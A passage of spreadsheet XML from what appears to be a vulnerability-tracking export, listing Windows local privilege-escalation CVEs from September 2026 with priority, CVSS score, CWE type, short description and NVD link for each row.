      <c r="A1319" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1319" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69492</t>
        </is>
      </c>
      <c r="C1319" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1319" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1319" s="5" t="inlineStr"/>
      <c r="F1319" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1319" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1319" s="5" t="inlineStr"/>
      <c r="I1319" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1319" s="5" t="inlineStr"/>
      <c r="K1319" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1319" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Partition Management Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1319" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69492</t>
        </is>
      </c>
    </row>
    <row r="1320">
      <c r="A1320" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1320" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69498</t>
        </is>
      </c>
      <c r="C1320" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1320" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1320" s="5" t="inlineStr"/>
      <c r="F1320" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1320" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1320" s="5" t="inlineStr"/>
      <c r="I1320" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1320" s="5" t="inlineStr"/>
      <c r="K1320" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1320" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1320" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69498</t>
        </is>
      </c>
    </row>
    <row r="1321">
      <c r="A1321" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1321" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69500</t>
        </is>
      </c>
      <c r="C1321" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1321" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1321" s="5" t="inlineStr"/>
      <c r="F1321" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1321" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1321" s="5" t="inlineStr"/>
      <c r="I1321" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1321" s="5" t="inlineStr"/>
      <c r="K1321" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1321" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Image Acquisition allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1321" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69500</t>
        </is>
      </c>
    </row>
    <row r="1322">
      <c r="A1322" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1322" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69501</t>
        </is>
      </c>
      <c r="C1322" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1322" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1322" s="5" t="inlineStr"/>
      <c r="F1322" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1322" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1322" s="5" t="inlineStr"/>
      <c r="I1322" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1322" s="5" t="inlineStr"/>
      <c r="K1322" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="L1322" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1322" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69501</t>
        </is>
      </c>
    </row>
    <row r="1323">
      <c r="A1323" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1323" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69517</t>
        </is>
      </c>
      <c r="C1323" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1323" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1323" s="5" t="inlineStr"/>
      <c r="F1323" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1323" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1323" s="5" t="inlineStr"/>
      <c r="I1323" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1323" s="5" t="inlineStr"/>
      <c r="K1323" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1323" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Wireless Networking allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1323" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69517</t>
        </is>
      </c>
    </row>
    <row r="1324">
      <c r="A1324" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1324" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69540</t>
        </is>
      </c>
      <c r="C1324" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1324" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1324" s="5" t="inlineStr"/>
      <c r="F1324" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1324" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1324" s="5" t="inlineStr"/>
      <c r="I1324" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1324" s="5" t="inlineStr"/>
      <c r="K1324" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1324" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1324" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69540</t>
        </is>
      </c>
    </row>
    <row r="1325">
      <c r="A1325" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1325" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69560</t>
        </is>
      </c>
      <c r="C1325" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1325" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1325" s="5" t="inlineStr"/>
      <c r="F1325" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1325" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1325" s="5" t="inlineStr"/>
      <c r="I1325" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1325" s="5" t="inlineStr"/>
      <c r="K1325" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1325" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Work Folder Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1325" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69560</t>
        </is>
      </c>
    </row>
    <row r="1326">
      <c r="A1326" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1326" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69563</t>
        </is>
      </c>
      <c r="C1326" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1326" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1326" s="5" t="inlineStr"/>
      <c r="F1326" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1326" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1326" s="5" t="inlineStr"/>
      <c r="I1326" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1326" s="5" t="inlineStr"/>
      <c r="K1326" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-367</t>
        </is>
      </c>
      <c r="L1326" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1326" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69563</t>
        </is>
      </c>
    </row>
    <row r="1327">
      <c r="A1327" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1327" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69564</t>
        </is>
      </c>
      <c r="C1327" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1327" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1327" s="5" t="inlineStr"/>
      <c r="F1327" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1327" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1327" s="5" t="inlineStr"/>
      <c r="I1327" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1327" s="5" t="inlineStr"/>
      <c r="K1327" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1327" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Online Certificate Status Protocol (OCSP) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1327" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69564</t>
        </is>
      </c>
    </row>
    <row r="1328">
      <c r="A1328" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1328" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69567</t>
        </is>
      </c>
      <c r="C1328" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1328" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1328" s="5" t="inlineStr"/>
      <c r="F1328" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1328" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1328" s="5" t="inlineStr"/>
      <c r="I1328" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1328" s="5" t="inlineStr"/>
      <c r="K1328" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1328" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1328" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69567</t>
        </is>
      </c>
    </row>
    <row r="1329">
      <c r="A1329" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1329" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69573</t>
        </is>
      </c>
      <c r="C1329" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1329" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1329" s="5" t="inlineStr"/>
      <c r="F1329" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1329" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1329" s="5" t="inlineStr"/>
      <c r="I1329" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1329" s="5" t="inlineStr"/>
      <c r="K1329" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1329" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Universal Disk Format File System Driver (UDFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1329" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69573</t>
        </is>
      </c>
    </row>
    <row r="1330">
      <c r="A1330" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1330" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69574</t>
        </is>
      </c>
      <c r="C1330" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1330" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1330" s="5" t="inlineStr"/>
      <c r="F1330" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1330" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1330" s="5" t="inlineStr"/>
      <c r="I1330" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1330" s="5" t="inlineStr"/>
      <c r="K1330" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1330" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1330" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69574</t>
        </is>
      </c>
    </row>
    <row r="1331">
      <c r="A1331" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1331" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69575</t>
        </is>
      </c>
      <c r="C1331" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1331" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1331" s="5" t="inlineStr"/>
      <c r="F1331" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1331" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1331" s="5" t="inlineStr"/>
      <c r="I1331" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1331" s="5" t="inlineStr"/>
      <c r="K1331" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1331" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Storage Spaces Controller allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1331" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69575</t>
        </is>
      </c>
    </row>
    <row r="1332">
      <c r="A1332" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1332" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69578</t>
        </is>
      </c>
      <c r="C1332" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1332" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1332" s="5" t="inlineStr"/>
      <c r="F1332" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1332" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1332" s="5" t="inlineStr"/>
      <c r="I1332" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1332" s="5" t="inlineStr"/>
      <c r="K1332" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="L1332" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1332" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69578</t>
        </is>
      </c>
    </row>
    <row r="1333">
      <c r="A1333" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1333" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69581</t>
        </is>
      </c>
      <c r="C1333" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1333" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1333" s="5" t="inlineStr"/>
      <c r="F1333" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1333" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1333" s="5" t="inlineStr"/>
      <c r="I1333" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1333" s="5" t="inlineStr"/>
      <c r="K1333" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L1333" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1333" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69581</t>
        </is>
      </c>
    </row>
    <row r="1334">
      <c r="A1334" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1334" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69600</t>
        </is>
      </c>
      <c r="C1334" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1334" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1334" s="5" t="inlineStr"/>
      <c r="F1334" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1334" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1334" s="5" t="inlineStr"/>
      <c r="I1334" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1334" s="5" t="inlineStr"/>
      <c r="K1334" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1334" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1334" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69600</t>
        </is>
      </c>
    </row>
    <row r="1335">
      <c r="A1335" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1335" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69605</t>
        </is>
      </c>
      <c r="C1335" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1335" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1335" s="5" t="inlineStr"/>
      <c r="F1335" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1335" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1335" s="5" t="inlineStr"/>
      <c r="I1335" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1335" s="5" t="inlineStr"/>
      <c r="K1335" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1335" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Install Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1335" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69605</t>
        </is>
      </c>
    </row>
    <row r="1336">
      <c r="A1336" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1336" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69606</t>
        </is>
      </c>
      <c r="C1336" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1336" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1336" s="5" t="inlineStr"/>
      <c r="F1336" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1336" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1336" s="5" t="inlineStr"/>
      <c r="I1336" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1336" s="5" t="inlineStr"/>
      <c r="K1336" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1336" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Shell allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1336" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69606</t>
        </is>
      </c>
    </row>
    <row r="1337">
      <c r="A1337" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1337" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69610</t>
        </is>
      </c>
      <c r="C1337" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1337" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1337" s="5" t="inlineStr"/>
      <c r="F1337" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1337" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1337" s="5" t="inlineStr"/>
      <c r="I1337" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1337" s="5" t="inlineStr"/>
      <c r="K1337" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L1337" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1337" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69610</t>
        </is>
      </c>
    </row>
    <row r="1338">
      <c r="A1338" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1338" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69613</t>
        </is>
      </c>
      <c r="C1338" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1338" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1338" s="5" t="inlineStr"/>
      <c r="F1338" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1338" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1338" s="5" t="inlineStr"/>
      <c r="I1338" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1338" s="5" t="inlineStr"/>
      <c r="K1338" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1338" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Image Acquisition allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1338" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69613</t>
        </is>
      </c>
    </row>
    <row r="1339">
      <c r="A1339" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1339" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69617</t>
        </is>
      </c>
      <c r="C1339" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1339" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1339" s="5" t="inlineStr"/>
      <c r="F1339" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1339" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1339" s="5" t="inlineStr"/>
      <c r="I1339" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1339" s="5" t="inlineStr"/>
      <c r="K1339" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1339" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Resilient File System (ReFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1339" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69617</t>
        </is>
      </c>
    </row>
    <row r="1340">
      <c r="A1340" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1340" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69621</t>
        </is>
      </c>
      <c r="C1340" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1340" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1340" s="5" t="inlineStr"/>
      <c r="F1340" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1340" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1340" s="5" t="inlineStr"/>
      <c r="I1340" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1340" s="5" t="inlineStr"/>
      <c r="K1340" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1340" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Fax Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1340" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69621</t>
        </is>
      </c>
    </row>
    <row r="1341">
      <c r="A1341" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1341" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69630</t>
        </is>
      </c>
      <c r="C1341" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1341" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1341" s="5" t="inlineStr"/>
      <c r="F1341" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1341" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1341" s="5" t="inlineStr"/>
      <c r="I1341" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1341" s="5" t="inlineStr"/>
      <c r="K1341" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1341" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1341" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69630</t>
        </is>
      </c>
    </row>
    <row r="1342">
      <c r="A1342" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1342" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69645</t>
        </is>
      </c>
      <c r="C1342" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1342" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1342" s="5" t="inlineStr"/>
      <c r="F1342" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1342" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1342" s="5" t="inlineStr"/>
      <c r="I1342" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1342" s="5" t="inlineStr"/>
      <c r="K1342" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1342" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Message Queuing allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1342" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69645</t>
        </is>
      </c>
    </row>
    <row r="1343">
      <c r="A1343" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1343" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69648</t>
        </is>
      </c>
      <c r="C1343" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1343" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1343" s="5" t="inlineStr"/>
      <c r="F1343" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1343" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1343" s="5" t="inlineStr"/>
      <c r="I1343" s="5" t="inlineStr">
